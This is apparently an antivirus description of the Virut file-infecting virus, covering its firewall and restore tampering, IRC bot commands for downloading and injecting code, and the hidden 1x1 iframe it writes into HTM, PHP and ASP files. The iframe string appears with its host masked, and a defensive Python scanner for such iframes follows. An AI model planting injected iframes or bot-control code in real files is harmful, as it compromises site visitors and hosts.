Virus.Win32.Virut

Detect Date 10/23/2007
Class Virus
Platform Win32
Description

The virus adds the executable file of the host process to the Windows firewall list of trusted applications.

Then it disables the “Restore system files” function.

The virus attempts to contact the following IRC servers:

  • prox*****ircgalaxy.pl
  • irc*****ef.pl

If a connection is established, the virus sends the following commands to the server:

  • NICK dewxxpyi
  • USER b
  • JOIN #.<rnd1>, where rnd1 is a random number.

Then the virus enters standby mode, ready to receive commands from the malicious IRC server and execute them.

The virus is capable of executing the following commands:

  • !Get: download malicious code from the Internet and inject it into processes running on the victim computer.
  • !hosu: open specified URLs on the victim computer.

The virus also scans the victim computer’s hard drive for files with the following extensions:

  • HTM
  • PHP
  • ASP

If found, it adds the following string into them:

<iframe src="http://****.pl/rc/" width=1 height=1 style="border:0"></iframe>
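A defender-side check for the file infection described above, added here as an example and not part of the original description: it walks a web root, finds 1x1-pixel iframes (the shape of the injected tag) in HTM/PHP/ASP files regardless of attribute order, quoting or case, and reports their src. The sample files and the MASKED-HOST.invalid placeholder standing in for the masked *.pl host are constructed.

```python
import re
import tempfile
from pathlib import Path

# Extensions the description says the virus modifies (.html added as the usual HTM variant).
TARGET_SUFFIXES = {".htm", ".html", ".php", ".asp"}
IFRAME_TAG = re.compile(r"<iframe\b([^>]*)>", re.IGNORECASE)
# Attribute values may be double-quoted, single-quoted or, as in the injected string, unquoted.
ATTR = re.compile(r"""(\w+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))""")

def parse_attrs(raw):
    # Map lower-cased attribute names to values for one tag's attribute string.
    return {m.group(1).lower(): next(v for v in m.groups()[1:] if v is not None)
            for m in ATTR.finditer(raw)}

def find_hidden_iframes(html):
    """Return the src of every 1x1-pixel iframe, the shape of the injected tag."""
    hits = []
    for m in IFRAME_TAG.finditer(html):
        attrs = parse_attrs(m.group(1))
        if attrs.get("width") == "1" and attrs.get("height") == "1":
            hits.append(attrs.get("src", ""))
    return hits

def scan_tree(root):
    """Walk a web root and return (relative path, src) for each hidden iframe found."""
    root = Path(root)
    findings = []
    for path in sorted(root.rglob("*")):
        if path.is_file() and path.suffix.lower() in TARGET_SUFFIXES:
            for src in find_hidden_iframes(path.read_text(errors="replace")):
                findings.append((path.relative_to(root).as_posix(), src))
    return findings

# Constructed sample pages; the URL is a placeholder for the masked *.pl host in the description.
INJECTED = '<iframe src="http://MASKED-HOST.invalid/rc/" width=1 height=1 style="border:0"></iframe>'
SAMPLE_FILES = {
    "index.htm": "<html><body>Welcome</body></html>" + INJECTED,
    "shop/cart.php": "<?php echo 'cart'; ?>" + INJECTED,
    "about.asp": '<iframe src="https://video.example/embed" width="560" height="315"></iframe>',
    "notes.txt": INJECTED,  # not a targeted extension, so never scanned
}

def run_demo():
    """Write the sample tree to a temp dir, scan it and return the findings."""
    with tempfile.TemporaryDirectory() as tmp:
        for name, body in SAMPLE_FILES.items():
            p = Path(tmp, name)
            p.parent.mkdir(parents=True, exist_ok=True)
            p.write_text(body)
        return scan_tree(tmp)

if __name__ == "__main__":
    print(run_demo())
```

Point scan_tree() at a real web root to sweep it; the legitimate full-size video embed in about.asp is not reported, only the two 1x1 frames.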